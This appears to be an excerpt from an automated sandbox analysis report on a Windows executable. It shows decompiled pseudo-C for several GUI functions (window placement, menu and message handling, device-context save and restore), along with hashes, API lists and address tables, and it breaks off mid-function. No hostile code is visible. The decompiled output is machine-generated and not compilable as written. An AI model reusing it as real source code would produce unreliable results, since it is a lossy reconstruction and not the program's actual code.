                                                                                • Instruction ID: e9062d91b70e892c12dd907cc0b9357d82f2089669128c1fe80cc258a350db4e
                                                                                • Opcode Fuzzy Hash: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction Fuzzy Hash: 49F15D30A04244EFDB01DBA9C985F9E77F5AB08305F2545AAE9009B3A3D739FE44DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 75%
                                                                                			E0043C024(void* __eax) {
                                                                                				void* _v28;
                                                                                				struct _WINDOWPLACEMENT _v56;
                                                                                				struct tagPOINT _v64;
                                                                                				intOrPtr _v68;
                                                                                				void* _t43;
                                                                                				struct HWND__* _t45;
                                                                                				struct tagPOINT* _t47;
                                                                                
                                                                                				_t47 =  &(_v64.y);
                                                                                				_t43 = __eax;
                                                                                				if(IsIconic( *(__eax + 0x180)) == 0) {
                                                                                					GetWindowRect( *(_t43 + 0x180), _t47);
                                                                                				} else {
                                                                                					_v56.length = 0x2c;
                                                                                					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                				}
                                                                                				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                                                                					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                                                                					if(_t45 != 0) {
                                                                                						ScreenToClient(_t45, _t47);
                                                                                						ScreenToClient(_t45,  &_v64);
                                                                                					}
                                                                                				}
                                                                                				 *(_t43 + 0x40) = _t47->x;
                                                                                				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                                                                				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                                                                				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                                                                				return E00434CF4(_t43);
                                                                                			}











                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction ID: 4f0afc93a760560917b7b20bdae421720c013cc4146441cd6652f2517ecf09cd
                                                                                • Opcode Fuzzy Hash: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction Fuzzy Hash: 25118171504201AFCB11DE6DC881A8B77E8AF4D314F044A3EFD58EB386D739D9048B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00449408(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                				intOrPtr _v8;
                                                                                				struct HMENU__* _v12;
                                                                                				signed int _v16;
                                                                                				char _v17;
                                                                                				intOrPtr _v24;
                                                                                				int _v28;
                                                                                				struct HDC__* _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v40;
                                                                                				intOrPtr _v44;
                                                                                				intOrPtr* _v48;
                                                                                				char _v52;
                                                                                				intOrPtr _t137;
                                                                                				signed int _t138;
                                                                                				struct HWND__* _t144;
                                                                                				signed int _t150;
                                                                                				signed int _t151;
                                                                                				intOrPtr* _t153;
                                                                                				void* _t158;
                                                                                				struct HMENU__* _t160;
                                                                                				intOrPtr* _t165;
                                                                                				void* _t173;
                                                                                				signed int _t177;
                                                                                				signed int _t181;
                                                                                				void* _t182;
                                                                                				void* _t214;
                                                                                				void* _t252;
                                                                                				signed int _t258;
                                                                                				void* _t266;
                                                                                				signed int _t272;
                                                                                				signed int _t273;
                                                                                				signed int _t275;
                                                                                				signed int _t276;
                                                                                				signed int _t278;
                                                                                				signed int _t279;
                                                                                				signed int _t281;
                                                                                				signed int _t282;
                                                                                				signed int _t284;
                                                                                				signed int _t285;
                                                                                				signed int _t287;
                                                                                				signed int _t288;
                                                                                				signed int _t291;
                                                                                				signed int _t292;
                                                                                				intOrPtr _t308;
                                                                                				intOrPtr _t312;
                                                                                				intOrPtr _t334;
                                                                                				intOrPtr _t343;
                                                                                				intOrPtr _t347;
                                                                                				intOrPtr* _t354;
                                                                                				signed int _t356;
                                                                                				intOrPtr* _t357;
                                                                                				signed int _t368;
                                                                                				signed int _t369;
                                                                                				signed int _t370;
                                                                                				signed int _t371;
                                                                                				signed int _t372;
                                                                                				signed int _t373;
                                                                                				signed int _t374;
                                                                                				intOrPtr* _t376;
                                                                                				void* _t378;
                                                                                				void* _t379;
                                                                                				intOrPtr _t380;
                                                                                				void* _t381;
                                                                                
                                                                                				_t378 = _t379;
                                                                                				_t380 = _t379 + 0xffffffd0;
                                                                                				_v52 = 0;
                                                                                				_t376 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_push(_t378);
                                                                                				_push(0x44993b);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t380;
                                                                                				_t137 =  *__edx;
                                                                                				_t381 = _t137 - 0x111;
                                                                                				if(_t381 > 0) {
                                                                                					_t138 = _t137 - 0x117;
                                                                                					__eflags = _t138;
                                                                                					if(_t138 == 0) {
                                                                                						_t272 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                						__eflags = _t272;
                                                                                						if(_t272 < 0) {
                                                                                							goto L67;
                                                                                						} else {
                                                                                							_t273 = _t272 + 1;
                                                                                							_t368 = 0;
                                                                                							__eflags = 0;
                                                                                							while(1) {
                                                                                								_t150 = E004487B4(E00413FA4(_v8, _t368),  *(_t376 + 4), __eflags);
                                                                                								__eflags = _t150;
                                                                                								if(_t150 != 0) {
                                                                                									goto L68;
                                                                                								}
                                                                                								_t368 = _t368 + 1;
                                                                                								_t273 = _t273 - 1;
                                                                                								__eflags = _t273;
                                                                                								if(_t273 != 0) {
                                                                                									continue;
                                                                                								} else {
                                                                                									goto L67;
                                                                                								}
                                                                                								goto L68;
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_t151 = _t138 - 8;
                                                                                						__eflags = _t151;
                                                                                						if(_t151 == 0) {
                                                                                							_v17 = 0;
                                                                                							__eflags =  *(__edx + 6) & 0x00000010;
                                                                                							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                                                								_v17 = 1;
                                                                                							}
                                                                                							_t275 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                							__eflags = _t275;
                                                                                							if(__eflags < 0) {
                                                                                								L32:
                                                                                								_t153 =  *0x486c60; // 0x487bfc
                                                                                								E00455E7C( *_t153, 0, __eflags);
                                                                                								goto L67;
                                                                                							} else {
                                                                                								_t276 = _t275 + 1;
                                                                                								_t369 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									__eflags = _v17 - 1;
                                                                                									if(_v17 != 1) {
                                                                                										_v12 =  *(_t376 + 4) & 0x0000ffff;
                                                                                									} else {
                                                                                										_t160 =  *(_t376 + 8);
                                                                                										__eflags = _t160;
                                                                                										if(_t160 == 0) {
                                                                                											_v12 = 0xffffffff;
                                                                                										} else {
                                                                                											_v12 = GetSubMenu(_t160,  *(_t376 + 4) & 0x0000ffff);
                                                                                										}
                                                                                									}
                                                                                									_t158 = E00413FA4(_v8, _t369);
                                                                                									_t296 = _v17;
                                                                                									_v16 = E004486F8(_t158, _v17, _v12);
                                                                                									__eflags = _v16;
                                                                                									if(__eflags != 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t369 = _t369 + 1;
                                                                                									_t276 = _t276 - 1;
                                                                                									__eflags = _t276;
                                                                                									if(__eflags != 0) {
                                                                                										continue;
                                                                                									} else {
                                                                                										goto L32;
                                                                                									}
                                                                                									goto L68;
                                                                                								}
                                                                                								E00432818( *((intOrPtr*)(_v16 + 0x58)), _t296,  &_v52, __eflags);
                                                                                								_t165 =  *0x486c60; // 0x487bfc
                                                                                								E00455E7C( *_t165, _v52, __eflags);
                                                                                							}
                                                                                						} else {
                                                                                							__eflags = _t151 == 1;
                                                                                							if(_t151 == 1) {
                                                                                								_t278 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                								__eflags = _t278;
                                                                                								if(_t278 < 0) {
                                                                                									goto L67;
                                                                                								} else {
                                                                                									_t279 = _t278 + 1;
                                                                                									_t370 = 0;
                                                                                									__eflags = 0;
                                                                                									while(1) {
                                                                                										_v48 = E00413FA4(_v8, _t370);
                                                                                										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                                                										__eflags = _t173 -  *(_t376 + 8);
                                                                                										if(_t173 ==  *(_t376 + 8)) {
                                                                                											break;
                                                                                										}
                                                                                										_t177 = E004486F8(_v48, 1,  *(_t376 + 8));
                                                                                										__eflags = _t177;
                                                                                										if(_t177 == 0) {
                                                                                											_t370 = _t370 + 1;
                                                                                											_t279 = _t279 - 1;
                                                                                											__eflags = _t279;
                                                                                											if(_t279 != 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L67;
                                                                                											}
                                                                                										} else {
                                                                                											break;
                                                                                										}
                                                                                										goto L68;
                                                                                									}
                                                                                									E00448FF8(_v48, _t376);
                                                                                								}
                                                                                							} else {
                                                                                								goto L67;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					goto L68;
                                                                                				} else {
                                                                                					if(_t381 == 0) {
                                                                                						_t281 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                						__eflags = _t281;
                                                                                						if(_t281 < 0) {
                                                                                							goto L67;
                                                                                						} else {
                                                                                							_t282 = _t281 + 1;
                                                                                							_t371 = 0;
                                                                                							__eflags = 0;
                                                                                							while(1) {
                                                                                								E00413FA4(_v8, _t371);
                                                                                								_t181 = E00448798( *(_t376 + 4), __eflags);
                                                                                								__eflags = _t181;
                                                                                								if(_t181 != 0) {
                                                                                									goto L68;
                                                                                								}
                                                                                								_t371 = _t371 + 1;
                                                                                								_t282 = _t282 - 1;
                                                                                								__eflags = _t282;
                                                                                								if(_t282 != 0) {
                                                                                									continue;
                                                                                								} else {
                                                                                									goto L67;
                                                                                								}
                                                                                								goto L68;
                                                                                							}
                                                                                						}
                                                                                						goto L68;
                                                                                					} else {
                                                                                						_t182 = _t137 - 0x2b;
                                                                                						if(_t182 == 0) {
                                                                                							_v40 =  *((intOrPtr*)(__edx + 8));
                                                                                							_t284 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                							__eflags = _t284;
                                                                                							if(_t284 < 0) {
                                                                                								goto L67;
                                                                                							} else {
                                                                                								_t285 = _t284 + 1;
                                                                                								_t372 = 0;
                                                                                								__eflags = 0;
                                                                                								while(1) {
                                                                                									_v16 = E004486F8(E00413FA4(_v8, _t372), 0,  *((intOrPtr*)(_v40 + 8)));
                                                                                									__eflags = _v16;
                                                                                									if(_v16 != 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t372 = _t372 + 1;
                                                                                									_t285 = _t285 - 1;
                                                                                									__eflags = _t285;
                                                                                									if(_t285 != 0) {
                                                                                										continue;
                                                                                									} else {
                                                                                										goto L67;
                                                                                									}
                                                                                									goto L69;
                                                                                								}
                                                                                								_v24 = E0041F488(0, 1);
                                                                                								_push(_t378);
                                                                                								_push(0x44976e);
                                                                                								_push( *[fs:eax]);
                                                                                								 *[fs:eax] = _t380;
                                                                                								_v28 = SaveDC( *(_v40 + 0x18));
                                                                                								_push(_t378);
                                                                                								_push(0x449751);
                                                                                								_push( *[fs:eax]);
                                                                                								 *[fs:eax] = _t380;
                                                                                								E0041FE44(_v24,  *(_v40 + 0x18));
                                                                                								E0041FCC0(_v24);
                                                                                								E00449BE0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                                                								_pop(_t334);
                                                                                								 *[fs:eax] = _t334;
                                                                                								_push(0x449758);
                                                                                								__eflags = 0;
                                                                                								E0041FE44(_v24, 0);
                                                                                								return RestoreDC( *(_v40 + 0x18), _v28);
                                                                                							}
                                                                                						} else {
                                                                                							_t214 = _t182 - 1;
                                                                                							if(_t214 == 0) {
                                                                                								_v44 =  *((intOrPtr*)(__edx + 8));
                                                                                								_t287 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                								__eflags = _t287;
                                                                                								if(_t287 < 0) {
                                                                                									goto L67;
                                                                                								} else {
                                                                                									_t288 = _t287 + 1;
                                                                                									_t373 = 0;
                                                                                									__eflags = 0;
                                                                                									while(1) {
                                                                                										_v16 = E004486F8(E00413FA4(_v8, _t373), 0,  *((intOrPtr*)(_v44 + 8)));
                                                                                										__eflags = _v16;
                                                                                										if(_v16 != 0) {
                                                                                											break;
                                                                                										}
                                                                                										_t373 = _t373 + 1;
                                                                                										_t288 = _t288 - 1;
                                                                                										__eflags = _t288;
                                                                                										if(_t288 != 0) {
                                                                                											continue;
                                                                                										} else {
                                                                                											goto L67;
                                                                                										}
                                                                                										goto L69;
                                                                                									}
                                                                                									_v32 = GetWindowDC( *(_v8 + 0x10));
                                                                                									 *[fs:eax] = _t380;
                                                                                									_v24 = E0041F488(0, 1);
                                                                                									 *[fs:eax] = _t380;
                                                                                									_v28 = SaveDC(_v32);
                                                                                									 *[fs:eax] = _t380;
                                                                                									E0041FE44(_v24, _v32);
                                                                                									E0041FCC0(_v24);
                                                                                									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44986f, _t378,  *[fs:eax], 0x44988c, _t378,  *[fs:eax], 0x4498b1, _t378);
                                                                                									_pop(_t343);
                                                                                									 *[fs:eax] = _t343;
                                                                                									_push(0x449876);
                                                                                									__eflags = 0;
                                                                                									E0041FE44(_v24, 0);
                                                                                									return RestoreDC(_v32, _v28);
                                                                                								}
                                                                                							} else {
                                                                                								if(_t214 == 0x27) {
                                                                                									_v36 =  *((intOrPtr*)(__edx + 8));
                                                                                									_t291 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                                									__eflags = _t291;
                                                                                									if(_t291 < 0) {
                                                                                										goto L67;
                                                                                									} else {
                                                                                										_t292 = _t291 + 1;
                                                                                										_t374 = 0;
                                                                                										__eflags = 0;
                                                                                										while(1) {
                                                                                											_t252 =  *((intOrPtr*)( *((intOrPtr*)(E00413FA4(_v8, _t374))) + 0x34))();
                                                                                											_t347 = _v36;
                                                                                											__eflags = _t252 -  *((intOrPtr*)(_t347 + 0xc));
                                                                                											if(_t252 !=  *((intOrPtr*)(_t347 + 0xc))) {
                                                                                												_v16 = E004486F8(E00413FA4(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                											} else {
                                                                                												_v16 =  *((intOrPtr*)(E00413FA4(_v8, _t374) + 0x34));
                                                                                											}
                                                                                											__eflags = _v16;
                                                                                											if(_v16 != 0) {
                                                                                												break;
                                                                                											}
                                                                                											_t374 = _t374 + 1;
                                                                                											_t292 = _t292 - 1;
                                                                                											__eflags = _t292;
                                                                                											if(_t292 != 0) {
                                                                                												continue;
                                                                                											} else {
                                                                                												goto L67;
                                                                                											}
                                                                                											goto L68;
                                                                                										}
                                                                                										_t258 = E00448728(E00413FA4(_v8, _t374), 1,  *((intOrPtr*)(_v36 + 8)));
                                                                                										__eflags = _t258;
                                                                                										if(_t258 == 0) {
                                                                                											_t266 = E00413FA4(_v8, _t374);
                                                                                											__eflags = 0;
                                                                                											_t258 = E00448728(_t266, 0,  *((intOrPtr*)(_v36 + 0xc)));
                                                                                										}
                                                                                										_t354 =  *0x486dac; // 0x487c00
                                                                                										_t356 =  *( *_t354 + 0x6c);
                                                                                										__eflags = _t356;
                                                                                										if(_t356 != 0) {
                                                                                											__eflags = _t258;
                                                                                											if(_t258 == 0) {
                                                                                												_t258 =  *(_t356 + 0x158);
                                                                                											}
                                                                                											_t308 =  *0x486dac; // 0x487c00
                                                                                											__eflags =  *(_t356 + 0x228) & 0x00000008;
                                                                                											if(( *(_t356 + 0x228) & 0x00000008) == 0) {
                                                                                												_t357 =  *0x486c60; // 0x487bfc
                                                                                												E00455B18( *_t357, _t292, _t308, _t258, _t374, _t376);
                                                                                											} else {
                                                                                												E00455B80();
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                								} else {
                                                                                									L67:
                                                                                									_push( *(_t376 + 8));
                                                                                									_push( *(_t376 + 4));
                                                                                									_push( *_t376);
                                                                                									_t144 =  *(_v8 + 0x10);
                                                                                									_push(_t144);
                                                                                									L00406CF8();
                                                                                									 *(_t376 + 0xc) = _t144;
                                                                                								}
                                                                                								L68:
                                                                                								_pop(_t312);
                                                                                								 *[fs:eax] = _t312;
                                                                                								_push(0x449942);
                                                                                								return E00404320( &_v52);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L69:
                                                                                			}


































































                                                                                0x00449909
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498f9
                                                                                0x00449900
                                                                                0x00449900
                                                                                0x00449465
                                                                                0x00000000
                                                                                0x00449465
                                                                                0x0044945f
                                                                                0x0044945c
                                                                                0x00000000
                                                                                0x00449432
                                                                                0x00449432
                                                                                0x00449470
                                                                                0x00449471
                                                                                0x00449473
                                                                                0x00000000
                                                                                0x00449479
                                                                                0x00449479
                                                                                0x0044947a
                                                                                0x0044947a
                                                                                0x0044947c
                                                                                0x00449481
                                                                                0x0044948a
                                                                                0x0044948f
                                                                                0x00449491
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449497
                                                                                0x00449498
                                                                                0x00449498
                                                                                0x00449499
                                                                                0x00000000
                                                                                0x0044949b
                                                                                0x00000000
                                                                                0x0044949b
                                                                                0x00000000
                                                                                0x00449499
                                                                                0x0044947c
                                                                                0x00000000
                                                                                0x00449434
                                                                                0x00449434
                                                                                0x00449437
                                                                                0x0044967a
                                                                                0x00449683
                                                                                0x00449684
                                                                                0x00449686
                                                                                0x00000000
                                                                                0x0044968c
                                                                                0x0044968c
                                                                                0x0044968d
                                                                                0x0044968d
                                                                                0x0044968f
                                                                                0x004496a6
                                                                                0x004496a9
                                                                                0x004496ad
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00449775
                                                                                0x00449776
                                                                                0x00449776
                                                                                0x00449777
                                                                                0x00000000
                                                                                0x0044977d
                                                                                0x00000000
                                                                                0x0044977d
                                                                                0x00000000
                                                                                0x00449777
                                                                                0x004496bf
                                                                                0x004496c4
                                                                                0x004496c5
                                                                                0x004496ca
                                                                                0x004496cd
                                                                                0x004496dc
                                                                                0x004496e1
                                                                                0x004496e2
                                                                                0x004496e7
                                                                                0x004496ea
                                                                                0x004496f6
                                                                                0x0044970b
                                                                                0x00449724
                                                                                0x0044972b
                                                                                0x0044972e
                                                                                0x00449731
                                                                                0x00449736
                                                                                0x0044973b
                                                                                0x00449750
                                                                                0x00449750
                                                                                0x0044943d
                                                                                0x0044943d
                                                                                0x0044943e
                                                                                0x00449785
                                                                                0x0044978e
                                                                                0x0044978f
                                                                                0x00449791
                                                                                0x00000000
                                                                                0x00449797
                                                                                0x00449797
                                                                                0x00449798
                                                                                0x00449798
                                                                                0x0044979a
                                                                                0x004497b1
                                                                                0x004497b4
                                                                                0x004497b8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004498b8
                                                                                0x004498b9
                                                                                0x004498b9
                                                                                0x004498ba
                                                                                0x00000000
                                                                                0x004498c0
                                                                                0x00000000
                                                                                0x004498c0
                                                                                0x00000000
                                                                                0x004498ba
                                                                                0x004497ca
                                                                                0x004497d8
                                                                                0x004497e7
                                                                                0x004497f5
                                                                                0x00449801
                                                                                0x0044980f
                                                                                0x00449818
                                                                                0x0044982d
                                                                                0x00449847
                                                                                0x0044984c
                                                                                0x0044984f
                                                                                0x00449852
                                                                                0x00449857
                                                                                0x0044985c
                                                                                0x0044986e
                                                                                0x0044986e
                                                                                0x00449444
                                                                                0x00449447
                                                                                0x00449578
                                                                                0x00449581
                                                                                0x00449582
                                                                                0x00449584
                                                                                0x00000000
                                                                                0x0044958a
                                                                                0x0044958a
                                                                                0x0044958b
                                                                                0x0044958b
                                                                                0x0044958d
                                                                                0x00449599
                                                                                0x0044959c
                                                                                0x0044959f
                                                                                0x004495a2
                                                                                0x004495cd
                                                                                0x004495a4
                                                                                0x004495b1
                                                                                0x004495b1
                                                                                0x004495d0
                                                                                0x004495d4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0044966a
                                                                                0x0044966b
                                                                                0x0044966b
                                                                                0x0044966c
                                                                                0x00000000
                                                                                0x00449672
                                                                                0x00000000
                                                                                0x00449672
                                                                                0x00000000
                                                                                0x0044966c
                                                                                0x004495ec
                                                                                0x004495f1
                                                                                0x004495f3
                                                                                0x004495fa
                                                                                0x00449605
                                                                                0x00449607
                                                                                0x00449607
                                                                                0x0044960c
                                                                                0x00449614
                                                                                0x00449617
                                                                                0x00449619
                                                                                0x0044961f
                                                                                0x00449621
                                                                                0x00449628
                                                                                0x00449628
                                                                                0x0044962e
                                                                                0x00449634
                                                                                0x0044963b
                                                                                0x00449657
                                                                                0x00449660
                                                                                0x0044963d
                                                                                0x0044964d
                                                                                0x0044964d
                                                                                0x0044963b
                                                                                0x00449619
                                                                                0x0044944d
                                                                                0x0044990b
                                                                                0x0044990e
                                                                                0x00449912
                                                                                0x00449915
                                                                                0x00449919
                                                                                0x0044991c
                                                                                0x0044991d
                                                                                0x00449922
                                                                                0x00449922
                                                                                0x00449925
                                                                                0x00449927
                                                                                0x0044992a
                                                                                0x0044992d
                                                                                0x0044993a
                                                                                0x0044993a
                                                                                0x0044943e
                                                                                0x00449437
                                                                                0x00449432
                                                                                0x00000000

                                                                                APIs
                                                                                • SaveDC.GDI32(?), ref: 004496D7
                                                                                • RestoreDC.GDI32(?,?), ref: 0044974B
                                                                                • GetWindowDC.USER32(?,00000000,0044993B), ref: 004497C5
                                                                                • SaveDC.GDI32(?), ref: 004497FC
                                                                                • RestoreDC.GDI32(?,?), ref: 00449869
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0044993B), ref: 0044991D
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: RestoreSaveWindow$NtdllProc_
                                                                                • String ID:
                                                                                • API String ID: 1346906915-0
                                                                                • Opcode ID: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction ID: a45c3f59b09cd28d2ba5bdec491db0630d48655138bc4fa014f9cd7e6cd3b5ed
                                                                                • Opcode Fuzzy Hash: 0b1900351f85a184ba78c5dddc9478e356d8c181e3ef901b2ea70d3ad8dc3fd5
                                                                                • Instruction Fuzzy Hash: BFE16E74A046099FEB10DF6AC48199FF3F5FF89304B2185AAE815A7325C738ED42DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E0044EEEC(intOrPtr __eax, intOrPtr* __edx) {
                                                                                				intOrPtr _v8;
                                                                                				int _v12;
                                                                                				intOrPtr _v16;
                                                                                				struct HDC__* _v20;
                                                                                				intOrPtr* _v24;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t92;
                                                                                				struct HWND__* _t93;
                                                                                				struct HWND__* _t96;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t119;
                                                                                				struct HWND__* _t125;
                                                                                				struct HWND__* _t128;
                                                                                				intOrPtr _t132;
                                                                                				intOrPtr _t133;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t136;
                                                                                				struct HWND__* _t138;
                                                                                				struct HWND__* _t141;
                                                                                				void* _t145;
                                                                                				intOrPtr _t148;
                                                                                				intOrPtr _t179;
                                                                                				intOrPtr* _t208;
                                                                                				intOrPtr _t233;
                                                                                				intOrPtr _t239;
                                                                                				intOrPtr _t246;
                                                                                				struct HWND__* _t250;
                                                                                				struct HWND__* _t251;
                                                                                				struct HWND__* _t256;
                                                                                				intOrPtr* _t257;
                                                                                				void* _t259;
                                                                                				void* _t261;
                                                                                				intOrPtr _t262;
                                                                                				void* _t264;
                                                                                				void* _t268;
                                                                                
                                                                                				_t259 = _t261;
                                                                                				_t262 = _t261 + 0xffffffec;
                                                                                				_t208 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_t92 =  *__edx;
                                                                                				_t264 = _t92 - 0x46;
                                                                                				if(_t264 > 0) {
                                                                                					_t93 = _t92 - 0xb01a;
                                                                                					__eflags = _t93;
                                                                                					if(_t93 == 0) {
                                                                                						__eflags =  *(_v8 + 0xa0);
                                                                                						if(__eflags != 0) {
                                                                                							E004037B0(_v8, __eflags);
                                                                                						}
                                                                                					} else {
                                                                                						__eflags = _t93 == 1;
                                                                                						if(_t93 == 1) {
                                                                                							__eflags =  *(_v8 + 0xa0);
                                                                                							if(__eflags != 0) {
                                                                                								E004037B0(_v8, __eflags);
                                                                                							}
                                                                                						} else {
                                                                                							goto L41;
                                                                                						}
                                                                                					}
                                                                                					goto L43;
                                                                                				} else {
                                                                                					if(_t264 == 0) {
                                                                                						_t116 = _v8;
                                                                                						_t233 =  *0x44f31c; // 0x1
                                                                                						__eflags = _t233 - ( *(_t116 + 0x1c) &  *0x44f318);
                                                                                						if(_t233 == ( *(_t116 + 0x1c) &  *0x44f318)) {
                                                                                							_t119 = _v8;
                                                                                							__eflags =  *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff;
                                                                                							if( *((intOrPtr*)(_t119 + 0x230)) - 0xffffffffffffffff < 0) {
                                                                                								_t132 = _v8;
                                                                                								__eflags =  *((char*)(_t132 + 0x22b)) - 2;
                                                                                								if( *((char*)(_t132 + 0x22b)) != 2) {
                                                                                									_t133 =  *((intOrPtr*)(__edx + 8));
                                                                                									_t26 = _t133 + 0x18;
                                                                                									 *_t26 =  *(_t133 + 0x18) | 0x00000002;
                                                                                									__eflags =  *_t26;
                                                                                								}
                                                                                							}
                                                                                							_t125 =  *((intOrPtr*)(_v8 + 0x230)) - 1;
                                                                                							__eflags = _t125;
                                                                                							if(_t125 == 0) {
                                                                                								L30:
                                                                                								_t128 =  *((intOrPtr*)(_v8 + 0x229)) - 2;
                                                                                								__eflags = _t128;
                                                                                								if(_t128 == 0) {
                                                                                									L32:
                                                                                									 *( *((intOrPtr*)(_t208 + 8)) + 0x18) =  *( *((intOrPtr*)(_t208 + 8)) + 0x18) | 0x00000001;
                                                                                								} else {
                                                                                									__eflags = _t128 == 3;
                                                                                									if(_t128 == 3) {
                                                                                										goto L32;
                                                                                									}
                                                                                								}
                                                                                							} else {
                                                                                								__eflags = _t125 == 2;
                                                                                								if(_t125 == 2) {
                                                                                									goto L30;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						goto L43;
                                                                                					} else {
                                                                                						_t96 = _t92 + 0xfffffffa - 3;
                                                                                						if(_t96 < 0) {
                                                                                							__eflags =  *0x46bb18;
                                                                                							if( *0x46bb18 != 0) {
                                                                                								__eflags =  *__edx - 7;
                                                                                								if( *__edx != 7) {
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t135 = _v8;
                                                                                									__eflags =  *(_t135 + 0x1c) & 0x00000010;
                                                                                									if(( *(_t135 + 0x1c) & 0x00000010) != 0) {
                                                                                										goto L43;
                                                                                									} else {
                                                                                										_t256 = 0;
                                                                                										_t136 = _v8;
                                                                                										__eflags =  *((char*)(_t136 + 0x22f)) - 2;
                                                                                										if( *((char*)(_t136 + 0x22f)) != 2) {
                                                                                											_t138 =  *(_v8 + 0x220);
                                                                                											__eflags = _t138;
                                                                                											if(_t138 != 0) {
                                                                                												__eflags = _t138 - _v8;
                                                                                												if(_t138 != _v8) {
                                                                                													_t256 = E0043BD14(_t138);
                                                                                												}
                                                                                											}
                                                                                										} else {
                                                                                											_t141 = E0044F74C(_v8);
                                                                                											__eflags = _t141;
                                                                                											if(_t141 != 0) {
                                                                                												_t256 = E0043BD14(E0044F74C(_v8));
                                                                                											}
                                                                                										}
                                                                                										__eflags = _t256;
                                                                                										if(_t256 == 0) {
                                                                                											goto L43;
                                                                                										} else {
                                                                                											_t96 = SetFocus(_t256);
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L44;
                                                                                						} else {
                                                                                							_t145 = _t96 - 0x22;
                                                                                							if(_t145 == 0) {
